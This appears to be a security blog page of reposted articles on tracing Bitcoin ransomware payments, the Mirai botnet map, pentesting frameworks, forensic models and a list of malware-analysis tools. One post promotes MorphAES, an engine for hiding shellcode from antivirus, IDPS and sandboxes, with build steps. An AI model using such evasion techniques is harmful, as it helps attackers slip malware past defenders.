Vulnerable Life by Vulneraman | Information Security Blog

The End of Bitcoin Ransomware?

Section 1. Introduction

Bitcoin, a virtual currency generated through peer-to-peer technology and not controlled by any central authority, is used not only for paying for goods and services, but also as a means to collect ransomware. The reason why ransomware creators use the virtual currency is the anonymity that Bitcoin provides, i.e., one can conduct Bitcoin transactions without the need to use his/her real name. In this regard, an FBI report on ransomware issued in 2015 points out: “Criminals prefer Bitcoin because it’s easy to use, fast, publicly available, decentralized and provides a sense of heightened security/anonymity.”

Despite the alleged anonymity of Bitcoin transactions, there are several ways in which the identity of Bitcoin users can be revealed. The purpose of this article is to examine them in the context of Bitcoin ransomware. More specifically, we will examine the classical forensic approach (Section 2) as well as two innovative approaches, namely, the use of the software applications BitCluster
(Section 3) and Elliptic (Section 4). Finally, we provide concluding remarks (Section 5).

Section 2. Classical forensic approach

Bitcoin is anonymous, yet pseudonymous virtual currency. This means that the names of the participants in Bitcoin transactions are anonymous, but the pseudonyms under which the transactions are concluded are public. The public key hashes of Bitcoin users are their pseudonyms. Hence, if law enforcement authorities succeed to link all public key hashes used by a criminal with his/her name, the authorities will receive information about all Bitcoin transactions completed by the criminal.

The classical forensic approach used for revealing the identities of Bitcoin users is to attempt to link a public key hash with a real name. Such a link can be established by using two methods, namely, (1) identifying a Bitcoin user solely on the basis of personal information collected by Bitcoin-processing businesses and (2) identifying a Bitcoin user on the basis of information about his/her use of a public key hash.

The first method consists of the following three steps: (1) sending a legal demand to Bitcoin-processing businesses (e.g., Bitcoin wallets and Bitcoin exchanges); (2) analyzing the received information; and (3) identifying the user of a particular public key hash. Regarding the first step, it should be noted that a large number of Bitcoin-processing businesses collect personal information from their customers. For example, all e-shops which accept Bitcoin use shipping addresses collected from their customers. Such addresses can be used for the identification of the buyers. As for the second step, many e-discovery software applications provide their users with the opportunity to analyze a vast amount of electronic data, such as paper documents, web data, cloud data, and data stored on mobile applications. The third step will be easily completed if the user of a particular public key hash has provided Bitcoin-processing business with his/her personal information.

The second method also consists of three steps, namely, (1) collecting information about the use of a public key hash, (2) combining the collected information with other available information, and (3) analyzing the research findings. For example, if a public key hash is discovered in the same time slots as the activity of a particular Facebook account, one can reasonably conclude that the user of the public key hash is the same person who owns the detected Facebook account.

The classical forensic approach still helps numerous law enforcement authorities in revealing the identities of participants in Bitcoin transactions. As Peter Van Valkenburgh, director of research at a Washington think tank focused on digital currencies, states: “Old fashioned police work is always going to be the main method of investigation.” The classical forensic approach is particularly helpful when investigating illegal Bitcoin exchanges which are related to ransomware. This is because such exchanges often use traditional payment accounts (e.g., a bank account) to keep the money received in exchange for Bitcoins. For example, in 2015, the FBI arrested two individuals for operating an illegal Bitcoin exchange, which was allegedly used for selling Bitcoins to victims of ransomware. The individuals transferred money to bank accounts in Eastern Europe, Hong Kong, and Cyprus and received money in bank accounts in the British Virgin Islands and Cyprus.

Section 3. BitCluster

BitCluster (freely downloadable at is an open-source tool which allows its users to group Bitcoin transactions by their participants. Such groups of transactions may be used for identifying Bitcoin users. Commenting on the purpose of the tool, Professor David Décary-Hétu, one of the creators of BitCluster, stated: “Our goal was to see, how much data can you gather on people who are using the Bitcoin network, and can you aggregate the Bitcoin wallets which seem to be anonymous and isolated from one another?”

BitCluster allows law enforcement authorities to calculate the amount of money generated by public key hashes. Consequently, the tool can be used for detecting ransomware schemes which generate significant amounts of ransom money. However, it is worth mentioning that BitCluster has an important disadvantage. Namely, the tool becomes useless if a ransomware creator generates a new public key hash for every payment transaction.

Although BitCluster is not created to be specifically used by law enforcement authorities, it can be used as a prototype for the development of comprehensive Bitcoin forensic software which is specifically tailored to the needs of the FBI and its foreign counterparts.

Section 4. Elliptic

Elliptic is a new technology which allows researchers to (1) trace entities transactions through the blockchain automatically and instantly; (2) uncover relationships between different entities; and (3) employ artificial intelligence to acquire digital clues from the Internet and the dark Web which can be used for uncovering the real identities of participants in Bitcoin transactions. Also, it should be noted that Elliptic assigns a risk score (0 = low risk, 10 = high risk) to participants in Bitcoin transactions.

The relationships between different entities are presented in Elliptic in the form of a comprehensive graphical user-interface. A screenshot of such a user-interface is provided below.

Figure 1: A screenshot of Elliptic user-interface

The screenshot indicates the relationships between the illegal marketplace “Silk Road” and various other entities processing Bitcoins. According to a report published by Trend Micro in 2013, “Silk Road” generated sales amounting to over 9,5 million Bitcoins, which equals to USD 1,2 billion.

Financial institutions widely use Elliptic, and law enforcement authorities to trace the origin of Bitcoins. Up until the present moment, it has processed more than USD 2 billion in Bitcoin transactions. Without the possibility to trace the origin of Bitcoins, legitimate financial organizations may trade with Bitcoins coming from illegal activities. Consequently, such processing may raise legal issues (e.g., violation of anti-money laundering laws) as well as reputational implications (acquiring the reputation of an institution involved in criminal activities). In an interview on this subject, Dr. Tom Robinson, COO & Co-Founder of Elliptic, pointed out: “We realized that what was holding back Bitcoin use by financial institutions was illicit activity on the dark Web. Financial institutions were scared to death.”

By providing actionable intelligence to law enforcement agencies and financial institutions, Elliptic may significantly hamper the operation of ransomware schemes. More specifically, Elliptic may facilitate the arrest of operators of ransomware schemes and enable financial institutions to refuse to process Bitcoins collected through ransomware attacks.

Section 5. Conclusion

The appearance of Bitcoin and other cryptocurrencies was the main cause for the recent proliferation of ransomware attacks. As Craig Williams, a security expert at Cisco, observed: “The ability to demand payment in Bitcoin, a difficult-to-trace virtual currency not controlled by any country, was ‘the birth of ransomware’ and has helped drive its success since the currency’s introduction in 2009.” The most widely known Bitcoin ransomware applications are CryptoWall and CryptoLocker.

The main reason for the success of Bitcoin ransomware is the difficulty related to tracing Bitcoin transactions. If this issue is eliminated, we can expect a decrease in the number of ransomware attacks which request victims to pay a ransom in Bitcoin. Although Bitcoin is considered to be anonymous cryptocurrency, our article examined three approaches to revealing the identity of criminals involved in Bitcoin ransomware schemes. Although none of the three approaches guarantees the complete identification of such criminals, the discussed approaches may provide a vast amount of information necessary for guiding governmental authorities in the investigation of ransomware attacks.

However, cyber-criminals do not remain passive observers of the developments of the discussed technologies. According to a study by Kharraz, Robertson, Balzarotti, Bilge, and Kirda, organizers of ransomware schemes started using techniques to protect their privacy, such as using multiple independent Bitcoin addresses, wherein each address processes small Bitcoin amounts. According to the same study, 84,46% of the examined Bitcoin addresses which were used for receiving ransomware payments had no more than six transactions. 68,93% of the examined addresses were active for no more than ten days. In 48.9% of the analyzed addresses, a Bitcoin address received no more than 2 Bitcoins. In the light of the findings of the aforementioned study, we may conclude that the new approaches to revealing the identity of Bitcoin users must constantly evolve to reflect the ever-changing ransomware landscape.


  1. Brook, C., ‘Bitcoin Phishing Campaign Uncovered,’ Threat Post, 21 June 2016. Available at
  2. Butnix, J., ‘Haggling The Price After A Ransomware Infection Can Pay Off,’ Live Bitcoin News, 19 July 2016. Available at
  3. Caffyn, G., ‘FBI: Malware Victims Should Pay Bitcoin Ransoms,’ CoinDesk, 26 October 2015. Available at
  4. Ciancaglini, V. et al., ‘Deepweb and Cybercrime’, Trend Micro. Available at .
  5. Cox, J., ‘7 Ways the Cops Will Bust You on the Dark Web’, MotherBoard, 26 June 2016. Available at
  6. Cox, J., ‘This Open Source Tool Can Map Out Bitcoin Payments,’ MotherBoard, 18 July 2016. Available
  7. Datt, S., ‘Learning Network Forensics,’ Packt Publishing: 2016. Available at
  8. Detsch, J., ‘Could bitcoin hold the key to stopping ransomware?’, The Christian Science Monitor, 1 July 2016. Available at
  9. Dunn, J. E., ‘Elliptic: UK Bitcoin startup plots future in dark web forensics,’ Tech World, 19 July 2016. Available at
  10. Elliptic. Available at .
  11. ‘Evaluating the Customer Journey of Crypto-Ransomware and the Paradox Behind It,’ F-Secure, 18 July 2016. Available at
  12. Gautham, ‘Bitcoin Ransomware May Soon Become a Thing of the Past’, News BTC, 3 July 2016. Available at
  13. Kharraz, A. et al., ‘Cutting the Gordian Knot: A Look Under the Hood of Ransomware Attacks,’ NEU SecLab, 23 June 2015. Available at
  14. ‘KSN Report: PC ransomware in 2014-2016′, Securelist, 22 June 2016. Available at
  15. ‘Manhattan U.S. Attorney Announces Charges Against Two Florida Men for Operating an Underground Bitcoin Exchange’, FBI, 21 July 2015. Available at
  16. Narayanan, A. et al., ‘Bitcoin and Cryptocurrency Technologies: A Comprehensive Introduction,’ Princeton University Press: 2016. Available at
  17. Stevenson, A., ‘We’re finally getting some answers over the massive JPMorgan hack,’ Business Insider UK, 22 July 2015. Available at
  18. Titcomb, J., ‘Bitcoin surveillance firm Elliptic raises $5m as banks push into blockchain‘, The Telegraph, 20 March 2016. Available at
  19. Van Impe, K., ‘Will Blockchain Technology Replace Traditional Business Models?’, Security Intelligence, 6 July 2016. Available at
  20. Williams-Grut, O., ‘New bitcoin technology can tell banks where coins come from with incredible accuracy,’ Business Insider UK, 18 June 2015. Available at

Original Post:

Here’s a Live Map of the Mirai Malware Infecting the World

Last weekend, a hacker publicly released the code of “Mirai”, the piece of Internet of Things malware that was used to create some of the most powerful botnets ever. Those botnets fired record breaking attacks at well-known security journalist Brian Krebs’s site, as well as a popular server provider company.

Naturally, this is a notable event for security researchers. But with one tool, ordinary, non-technical citizens can watch the malware spread too.

On Monday, the security researcher known as MalwareTech released a map showing, in real-time, infections of Mirai across the world.

As MalwareTech explains in a blog post, the scanner uses hundreds of custom servers designed to emulate vulnerable internet of things devices. These act as honeypots, and report when someone, somewhere, tries to hack them.

“It’s a stream from the sensors; as soon as you connect it will notify you of each hit,” MalwareTech told Motherboard in a Twitter message.

Serbia, China, Brazil, Russia, India, Pakistan: the list of affected countries goes on and on, as this capture of the map shows:

“Nothing stood out, just that the botnet was mostly CCTV cameras,” MalwareTech continued.

At the end of September, Krebs’ site Krebs on Security was the victim of a record-breaking DDoS attack of around 660 GBps of traffic. DDoS-protection service Akamai, which had been providing Krebs with pro-bono protection, had to drop the journalist from their network. Two botnets were behind that attack, consisting of around 980,000 and 500,000 devices respectively, according to Level 3 Communications, one of the world’s largest internet backbone providers.

What made these botnets stand out, apart from their raw power, was that they consisted almost exclusively of internet connected cameras, and other “smart” devices. Days after the attack on Krebs, French hosting provider OVH later reported seeing attacks of 900 Gbps and 1 Tbps.

Now, everyone can bask, or recoil in terror, at the sight of lowly cameras forming ever more powerful botnets.

MalwareTech Live Map of Mirai

Original Post:

OWASP OWTF – Offensive Web Testing Framework

OWASP Offensive Web Testing Framework is a project focused on penetration testing efficiency and alignment of security tests to security standards like: The OWASP Testing Guide (v3 and v4), the OWASP Top 10, PTES and NIST.

OWASP OWTF - Offensive Web Testing Framework

The purpose of this tool is to automate the manual and uncreative parts of pen testing. For example, Figuring out how to call “tool X” then parsing results of “tool X” manually to feed “tool Y” and so on is time consuming.

By reducing this burden we hope pen testers will have more time to:

  • See the big picture and think out of the box,
  • Find, verify and combine vulnerabilities efficiently,
  • Have time to Investigate complex vulnerabilities like business logic, architectural flaws, virtual hosting sessions, etc.
  • Perform more tactical/targeted fuzzing on seemingly risky areas
  • Demonstrate true impact despite the short time-frames we are typically given to test.


This tool is however not a silver bullet and will only be as good as the person using it. Understanding and experience will be required to correctly interpret the tool output and decide what to investigate further in order to demonstrate the impact.


  • Web UI. Now configure and monitor OWTF via a responsive and powerful interface accessible via your browser.
  • Exposes RESTful APIs to all core OWTF capabilties.
  • Instead of implementing yet another spider (a hard job), OWTF will scrub the output of all tools/plugins run to gather as many URLs as possible.
  • Scan by various aggression levels: OWTF supports scans which are based on the aggressiveness of the plugins/tools invoked.
  • Extensible OWTF manages tools through ‘plugins’ making it trivial to add new tools.
  • OWTF has been developed keeping Kali Linux in mind, but it also supports other pentesting distros such as Samurai-WTF, etc.
  • Tool paths and configuration can be easily modified in the web interface.
  • Fastest Python MiTM proxy yet!
  • Crash reporting directly to Github issue tracker
  • Comprehensive interactive report at end of each scan
  • Easy plugin-based system; currently 100+ plugins!
  • CLI and web interface

You can download OWASP OWTF here:

Or read more here.


Download Offensive Web Testing Framework:

Original Post:

Portable Penetration Testing Distribution for Windows: PentestBox

    PentestBox is not like other Penetration Testing Distributions which runs on virtual machines. It is created because more than 70% of penetration testing distributions users uses windows and provides an efficient platform for Penetration Testing on windows. It provides all security tools as a software package, eliminating requirement of Virtual machines or dualboot environments on Windows Operating System. It is created because more than 50% of penetration testing distribution users uses windows.




A Portable Penetration Testing Distribution for Windows: PentestBox


Easy to Use

It is a command line utility which is all what you want.


Awesome Design

It is the same green font on black terminal but in an modern way.


Best Performance

PentestBox directly runs on host machine instead of virtual machines, so performance gain is obvious.


No Dependencies Needed

All the dependencies required by tools are inside PentestBox, so you can even run PentestBox on freshly installed windows without any hassle.



PentestBox is entirely portable, so now you can carry your own Penetration Testing Environment on a USB stick. It will take care of dependencies required to run tools which are inside it.


Linux Environment

PentestBox contains nearly all Linux utilities like bash, cat, chmod, curl, git, gzip, ls, mv, ps, ssh, sh, uname and others. It even contains your favourite text editor “vim”.  Because of this, most penetration testing tools which were earlier compatible only with Linux are working smoothly in PentestBox on Windows.


No Driver Issue

Windows has already large support of drivers for Graphic Cards and wireless chip-sets. Now, you don’t have to worry about drivers compatibility issues.



Only the best tools went into PentestBox, but if you miss something you can easily install it using tools-manager from the inside of PentestBox environment.


Less memory Usage

PentestBox runs on host machine without any need for virtual machine. It only needs 20 MB – compared to at least 2GB of RAM need for running virtual machine distributions.


Less Disk Usage

PentestBox is very light. It requires less than third of space of other penetration testing Linux distributions.


Inbuilt Browser

PentestBox packs a Mozilla Firefox Browser with nearly all security addons.


Automatic Updates

Automatic update feature will keep your tool up to date.


Can Be Shared On A Network

You can use PentestBox on many computers by sharing it through network. You don’t have to install it on each and every computer that you want it to run on. Just install PentestBox on one computer and share it to all other computers on the same network.











No Metasploit ?

Metasploit contain exploits/payloads inside its folder structure, so when installed on windows machines nearly all anti-viruses and firewalls fire up. Metasploit officially instruct users to disable anti-viruses and firewalls while using it. It’s your call. If you willing to switch off your antiviruses program and want to use Metsaploit on Windows, you can download windows installer for Metsaploit from officially Metsaploit website.


PentestBox throwing up red flags ?

PentestBox is packed by UPX which is identified as malware by some antivirus softwares. You can scan PentestBox.exe with and see the result. As an alternative there is a PentestBox.bat file in the same directory which upon running won’t show any warnings. There are some ruby gems also which can also flag as virus/malware, you can remove those of your antivirus are flagging it. Also THC-SSL-DOS will also be flagged because of it’s action against SSL servers.If you worried about those warnings then you can allow your Antivirus to remove those files, in that case you can start PentestBox through PentestBox.bat file and THC-SSL-DOS will not work. Rest other tools/products will work normally.


How to include your own Tool

If you want to include a tool which is not currently present in PentestBox then below are the ways to include it.

  • If it is Python based program
    • Place that folder in PentestBox_Directory/bin or in any folder inside bin.
    • As Python is configured inside PentestBox, you can directly go to that directory and then run that program by prepending python to the filename.
    • But if you want to set an alias for that program then please follow How to add an alias
  • If it is Ruby Based Program
    • Place that folder in PentestBox_Directory/bin or in any folder inside bin.
    • As Ruby is configured inside PentestBox, you can directly go to that directory and then run that program by prepending ruby to the filename.
    • But if you want to set an alias for that program then please follow How to add an alias
  • It it is Executable file
    • Place that folder in PentestBox_Directory/bin or in any folder inside bin.
    • You can directly access by moving to that folder and typing the filename.
    • But if you want to set an alias for that program then please follow How to add an alias


Source && Download



Original Post:

MorphAES – IDPS & SandBox & AntiVirus STEALTH KILLER

MorphAES is the world’s first polymorphic shellcode/malware engine, with metamorphic properties and capability to bypass sandboxes, which makes it undetectable for an IDPS, it’s cross-platform as well and library-independent.


  • Polymorphism (AES encryption)
  • Metamorphism (logic and constants changing)
  • Platform independent (Linux/BSD/Windows)
  • IDPS stealthing (the total number of possible signatures is more the number of atoms in the universe for one given code)
  • Sandbox evasion (special assembly instructions)
  • Realism (no null bytes)
  • Can produce executables (malwares)
  • Input code can have arbitrary length

Dependencies for the morpher:

  • Python 2.7 – main engine
  • Python Crypto 2.6 – for encryption

Dependencies for the code execution:

  • 64-bit Intel AES-NI – for decryption

Nonetheless, there are some limitations (aka white-hat aspects):

  • Metamorphism is not very robust and can be detected using regular expressions (but can be improved pretty easily)
  • Unicode null bytes might still work (but who cares?)
  • It will only work on 64-bit Intel processors with AES-NI support, but since all the user’s PCs (like Pentium, Celeron, i3, i5, i7) and the industry’s servers (like Xeon) have it, it’s more a specification, rather than a limitation, thus a 32-bit implementation is unpractical
  • Almost any shellcode is guarantee to work however, an arbitrary code (malware) doesn’t
  • Windows/BSD PoC and executables are in progress…

How it works

  1. Shellcode padding with NOPs (since AES is a block cipher)
  2. Shellcode encryption with a random key using AES-128-ECB (not the best, but the simplest) – polymorphism
  3. Constants randomization, logic changes, instructions modification and rewriting – metamorphism

For Linux:

sudo apt-get install python python-crypto

Execute the Pyhton script and enter your shellcode or nothing for a default Linux shell. You can specify your own execution address as well.
It is possible to build and execute on Windows/BSD/Mac as well, but I’m still testing it.
You can also use the Linux PoC in assembly:

as shellcode.s -o shellcode.o
ld shellcode.o -o shellcode

Every file is commented and explained

At this point, it should be pretty obvious that, the hashes would be different every time, but let’s compare SSDEEPes of 2 Linux executables of the same shellcode:

  • 96:GztTHyKGQh3lo6Olv4W4zS/2WnDf74i4a4B7UEoB46keWJl09:Gzty6VOlvqSTDflmNroh,
  • 96:GQtT23yKmFUh3lo6OlOnIrFS4rkoPPf74i4a4B7UEoB46keWJ5:GQtCGWVOlOWFSsPflmNroh,

Well, there’s something in common, but globally those are 2 different signatures, now what about the shellcode it-self:

  • 48:eip2bR2LRNtRPORDGRopRBXR3cRzER2vRU9BnH6ksr:Srn+,
  • 48:6RjNeR2IRN7RPWRDeRokRB5R3xRz3R28RUxFT2+75eFK9iKMAdXAJKo:O9Tdwoo,

Almost totally different signatures for the same morphed shellcode!
At the publication date, the executable was detected as a shellcode only by 2 out of 53 antiviruses (AVG and Ikarus) onvirustotal , but now, it just fails to analyze.
malwr’s with cuckoo2 doesn’t see anything suspicious.
On the reverser’s perspective, IDA won’t see anything either.
Radare2 would show the real instructions only if assembled by the assembler it-self however, it doesn’t detects any crypto or suspicious activity for the executable.
Althrough, I didn’t test it personally, I think that FortiSandbox, Sophos Sandstorm, Blue Coat, GateWatcher and their derivatives might fail badly…

To put it in the nutshell
Basically, it can transform a script-kid’s code (or a known-one ) into a zero-day.
IDPS will fail because, it’s almost impossible to make a signature and difficult to make a regular expression or heuristic analysis.
Most of the sandboxes doesn’t use Intel’s AES-NI instructions directly, so they will not execute the code, so “everything is fine” for them, whereas it’s not.
The only way to defeat this type of shellcode/malware is to use an appropriate sandboxing or/and an AI.
Notice that, the whole execution is done by a pure assembly, no Python (or shitty OpenSSL) is needed for the shellcode’s/malware’s execution since, I use built-in assembly instructions only, thus it’s system-independent (surely, you will have to assemble it for each-one by adapting the instructions/opcodes, but they are still same).

This is still a work in progress, I will implement Windows and BSD/Mac engines and PoCs ASAP.
IDPSes and sanboxes suck.

“Tradition becomes our security, and when the mind is secure it is in decay.”

Jiddu Krishnamurti

Original Post:

Digital Forensics According to the FORZA Model and Diamond Model for Intrusion Analysis

The Bridge on the River Forza

We can teach these barbarians a lesson in Western methods and efficiency that will put them to shame.” -Colonel Nicholson (The Bridge on the River Kwai, 1957)

Efficiency. Something we look to implement in everything we do, whether that be through the elimination of waste through Six Sigma, or other frameworks and methodologies, efficiency is what we strive for. When performing digital forensics, efficiency and rigor in our approach to ensure no stone left unturned is paramount to the success of the investigation.

One of the many frameworks that exists is FORZA, a group of tasks and processes in a digital forensics investigation that revolves around a triad of: Reconnaissance, Reliability, and Relevancy.

For Reconnaissance, the case examiner will collect, recover, decode, discover, extract, analyze, and convert data that is kept on different storage media to readable evidence.

Reliability speaks to the integrity of the evidence and the relationship between the people and the evidence such that it will hold up in court if prosecuted.

Relevancy speaks to the relevancy of the evidence, even if it is admissible in court.

The FORZA Framework defines eight separate roles in a digital forensics investigation, the case leader, system/business owner, legal advisor, security/system architect/auditor, digital forensics specialist, digital forensics investigator/system administrator/operator, digital forensics analyst, and a legal prosecutor.

Each of these roles are interconnected through six categories of questions that must be answered in the investigation: (1) What (data); (2) Why (motivation); (3) How (function); (4) Who (people); (5) Where (network); and (6) when (time). If you think about it, this is very similar to what a crime scene investigator must answer when investigating a murder scene, which is why I’m always saying that digital forensics is like CSI: Miami meets Bones.

Here’s a short video I made on the topic.

Below is a table detailing out the responsibilities for each role in answering each of the six questions.

Okay, so now that we’ve covered FORZA (don’t get confused here), let’s discuss a newer, more novel model gaining widespread popularity, which is the Diamond Model of Intrusion Analysis; a model of intrusion analysis built by analysts, asking the simple question, “What is the underlying method to our work?” The model establishes the basic atomic element of any intrusion activity, the event, composed of four core features: adversary, infrastructure, capability, and victim.

These features are edge-connected representing their underlying relationships and arranged in the shape of a diamond, giving the model its name.

In its simplest form, the model describes that an adversary deploys a capability over some infrastructure against a victim. These activities are called events and are the atomic features. Analysts populate the model’s vertices as events are discovered and detected. The vertices are linked with edges highlighting the natural relationship between the features. By pivoting across edges and within vertices, analysts expose more information about adversary operations and discover new capabilities, infrastructure, and victims.

The Diamond Model of intrusion analysis comprises the core features of an intrusion event:adversary, capability, infrastructure, and victim. The core features are linked via edges to represent the fundamental relationships between the features which can be exploited analytically to further discover and develop knowledge of malicious activity.

The above depiction models analytic pivoting using the Diamond Model. One of the most powerful features of the Diamond — pivoting, allows an analyst to exploit the fundamental relationship between features (highlighted by edges between the features) to discover new knowledge of malicious activity.

Subsequent to this analysis is an Activity-Attack Graph, diagrammed above. This chart illustrates the integration of knowledge of actual adversary attack paths with the multitude of hypothetical attack paths that could be taken. Using an activity-attack graph highlights the potential paths of an adversary in the future as well as the preferred paths based on current knowledge.

As forensic analysts, we should always look to be continuously improving our craft, especially around our methodology in how we conduct investigations. I leave it to you to decide on which methodology you adopt, or possibly even make better.

A sample report has been created by Brier & Thorn that has been designed around the Diamond Model and is available here for free download.

More information on the Diamond Model can be found here and here.

Original Post:

Awesome Malware Analysis Lists

A curated list of awesome malware analysis tools and resources. Inspired by awesome-python and awesome-php.

Malware Collection


Web traffic anonymizers for analysts.

  • – A free, web based anonymizer.
  • OpenVPN – VPN software and hosting solutions.
  • Privoxy – An open source proxy server with some privacy features.
  • Tor – The Onion Router, for browsing the web without leaving traces of the client IP.


Trap and collect your own samples.

  • Conpot – ICS/SCADA honeypot.
  • Dionaea – Honeypot designed to trap malware.
  • Glastopf – Web application honeypot.
  • Honeyd – Create a virtual honeynet.
  • HoneyDrive – Honeypot bundle Linux distro.
  • Kippo – Medium interaction SSH honeypot.
  • Mnemosyne – A normalizer for honeypot data; supports Dionaea.
  • Thug – Low interaction honeyclient, for investigating malicious websites.

Malware Corpora

Malware samples collected for analysis.

  • Clean MX – Realtime database of malware and malicious domains.
  • Contagio – A collection of recent malware samples and analyses.
  • Exploit Database – Exploit and shellcode samples.
  • Malshare – Large repository of malware actively scrapped from malicious sites.
  • maltrieve – Retrieve malware samples directly from a number of online sources.
  • MalwareDB – Malware samples repository.
  • theZoo – Live malware samples for analysts.
  • ViruSign – Malware database that detected by many anti malware programs except ClamAV.
  • VirusShare – Malware repository, registration
  • Zeltser’s Sources – A list of malware sample sources put together by Lenny Zeltser.
  • Zeus Source Code – Source for the Zeus trojan leaked in 2011. required.

Open Source Threat Intelligence


Harvest and analyze IOCs.

  • Combine – Tool to gather Threat Intelligence indicators from publicly available sources.
  • IntelMQ – A tool for CERTs for processing incident data using a message queue.
  • IOC Editor – A free editor for XML IOC files, from Mandiant.
  • ioc_writer – Python library for working with OpenIOC objects, from Mandiant.
  • Massive Octo Spice – Previously known as CIF (Collective Intelligence Framework). Aggregates IOCs from various lists. Curated by the CSIRT Gadgets Foundation.
  • MISP – Malware Information Sharing Platform curated by The MISP Project.
  • PassiveTotal – Research, connect, tag and share IPs and domains.
  • threataggregator – Aggregates security threats from a number of sources, including some of those listed below in other resources.
  • ThreatCrowd – A search engine for threats, with graphical visualization.
  • TIQ-test – Data visualization and statistical analysis of Threat Intelligence feeds.

Other Resources

Threat intelligence and IOC resources.

Detection and Classification

Antivirus and other malware identification tools

  • AnalyzePE – Wrapper for a variety of tools for reporting on Windows PE files.
  • chkrootkit – Local Linux rootkit detection.
  • ClamAV – Open source antivirus engine.
  • ExifTool – Read, write and edit file metadata.
  • hashdeep – Compute digest hashes with a variety of algorithms.
  • Loki – Host based scanner for IOCs.
  • Malfunction – Catalog and compare malware at a function level.
  • MASTIFF – Static analysis framework.
  • MultiScanner – Modular file scanning/analysis framework
  • nsrllookup – A tool for looking up hashes in NIST’s National Software Reference Library database.
  • packerid – A cross-platform Python alternative to PEiD.
  • PEiD – Packer identifier for Windows binaries.
  • PEV – A multiplatform toolkit to work with PE files, providing feature-rich tools for proper analysis of suspicious binaries.
  • Rootkit Hunter – Detect Linux rootkits.
  • ssdeep – Compute fuzzy hashes.
  • – Python script for easy searching of the database.
  • TrID – File identifier.
  • YARA – Pattern matching tool for analysts.
  • Yara rules generator – Generate yara rules based on a set of malware samples. Also contains a good strings DB to avoid false positives.

Online Scanners and Sandboxes

Web-based multi-AV scanners, and malware sandboxes for automated analysis.

  • AndroTotal – free online analysis of APKs against multiple mobile antivirus apps.
  • Anubis – Malware Analysis for Unknown Binaries and Site Check.
  • AVCaesar – online scanner and malware repository.
  • Cryptam – Analyze suspicious office documents.
  • Cuckoo Sandbox – Open source, self hosted sandbox and automated analysis system.
  • cuckoo-modified – Modified version of Cuckoo Sandbox released under the GPL. Not merged upstream due to legal concerns by the author.
  • DeepViz – Multi-format file analyzer with machine-learning classification.
  • DRAKVUF – Dynamic malware analysis system.
  • Hybrid Analysis – Online malware analysis tool, powered by VxSandbox.
  • IRMA – An asynchronous and customizable analysis platform for suspicious files.
  • Jotti – Free online multi-AV scanner.
  • Malheur – Automatic sandboxed analysis of malware behavior.
  • Malwr – Free analysis with an online Cuckoo Sandbox instance.
  • MASTIFF Online – Online static analysis of malware.
  • Metascan Online – Free file scanning with multiple antivirus engines.
  • Noriben – Uses Sysinternals Procmon to collect information about malware in a sandboxed environment.
  • PDF Examiner – Analyse suspicious PDF files.
  • Recomposer – A helper script for safely uploading binaries to sandbox sites.
  • VirusTotal – Free online analysis of malware samples and URLs
  • Zeltser’s List – Free automated sandboxes and services, compiled by Lenny Zeltser.

Domain Analysis

Inspect domains and IP addresses.

  • – One click tool to retrieve as much metadata as possible for a website and to assess its good standing.
  • Dig – Free online dig and other network tools.
  • IPinfo – Gather information about an IP or domain by searching online resources.
  • SenderBase – Search for IP, domain or network owner.
  • SpamCop – IP based spam block list.
  • SpamHaus – Block list based on domains and IPs.
  • Sucuri SiteCheck – Free Website Malware and Security Scanner.
  • TekDefense Automator – OSINT tool for gatherig information about URLs, IPs, or hashes.
  • Whois – DomainTools free online whois search.
  • Zeltser’s List – Free online tools for researching malicious websites, compiled by Lenny Zeltser.

Browser Malware

Analyze malicious URLs. See also the domain analysis and documents and shellcode sections.

  • Firebug – Firefox extension for web development.
  • Java Decompiler – Decompile and inspect Java apps.
  • Java IDX Parser – Parses Java IDX cache files.
  • JSDetox – JavaScript malware analysis tool.
  • jsunpack-n – A javascript unpacker that emulates browser functionality.
  • Malzilla – Analyze malicious web pages.
  • RABCDAsm – A “Robust ActionScript Bytecode Disassembler.”
  • swftools – Tools for working with Adobe Flash files.
  • xxxswf – A Python script for analyzing Flash files.

Documents and Shellcode

Analyze malicious JS and shellcode from PDFs and Office documents. See also the browser malware section.

  • AnalyzePDF – A tool for analyzing PDFs and attempting to determine whether they are malicious.
  • diStorm – Disassembler for analyzing malicious shellcode.
  • JS Beautifier – JavaScript unpacking and deobfuscation.
  • libemu – Library and tools for x86 shellcode emulation.
  • malpdfobj – Deconstruct malicious PDFs into a JSON representation.
  • OfficeMalScanner – Scan for malicious traces in MS Office documents.
  • olevba – A script for parsing OLE and OpenXML documents and extracting useful information.
  • Origami PDF – A tool for analyzing malicious PDFs, and more.
  • PDF Tools – pdfid, pdf-parser, and more from Didier Stevens.
  • PDF X-Ray Lite – A PDF analysis tool, the backend-free version of PDF X-RAY.
  • peepdf – Python tool for exploring possibly malicious PDFs.
  • Spidermonkey – Mozilla’s JavaScript engine, for debugging malicious JS.

File Carving

For extracting files from inside disk and memory images.

  • bulk_extractor – Fast file carving tool.
  • EVTXtract – Carve Windows Event Log files from raw binary data.
  • Foremost – File carving tool designed by the US Air Force.
  • Hachoir – A collection of Python libraries for dealing with binary files.
  • Scalpel – Another data carving tool.


Reverse XOR and other code obfuscation methods.

  • Balbuzard – A malware analysis tool for reversing obfuscation (XOR, ROL, etc) and more.
  • de4dot – .NET deobfuscator and unpacker.
  • ex_pe_xor & iheartxor – Two tools from Alexander Hanel for working with single-byte XOR encoded files.
  • NoMoreXOR – Guess a 256 byte XOR key using frequency analysis.
  • unxor – Guess XOR keys using known-plaintext attacks.
  • XORBruteForcer – A Python script for brute forcing single-byte XOR keys.
  • XORSearch & XORStrings – A couple programs from Didier Stevens for finding XORed data.
  • xortool – Guess XOR key length, as well as the key itself.

Debugging and Reverse Engineering

Disassemblers, debuggers, and other static and dynamic analysis tools.

  • Bokken – GUI for Pyew and Radare.
  • dnSpy – .NET assembly editor, decompiler and debugger.
  • Evan’s Debugger (EDB) – A modular debugger with a Qt GUI.
  • GDB – The GNU debugger.
  • hackers-grep – A utility to search for strings in PE executables including imports, exports, and debug symbols.
  • IDA Pro – Windows disassembler and debugger, with a free evaluation version.
  • Immunity Debugger – Debugger for malware analysis and more, with a Python API.
  • ltrace – Dynamic analysis for Linux executables.
  • objdump – Part of GNU binutils, for static analysis of Linux binaries.
  • OllyDbg – An assembly-level debugger for Windows executables.
  • pestudio – Perform static analysis of Windows executables.
  • Process Monitor – Advanced monitoring tool for Windows programs.
  • Pyew – Python tool for malware analysis.
  • Radare2 – Reverse engineering framework, with debugger support.
  • strace – Dynamic analysis for Linux executables.
  • Udis86 – Disassembler library and tool for x86 and x86_64.
  • Vivisect – Python tool for malware analysis.
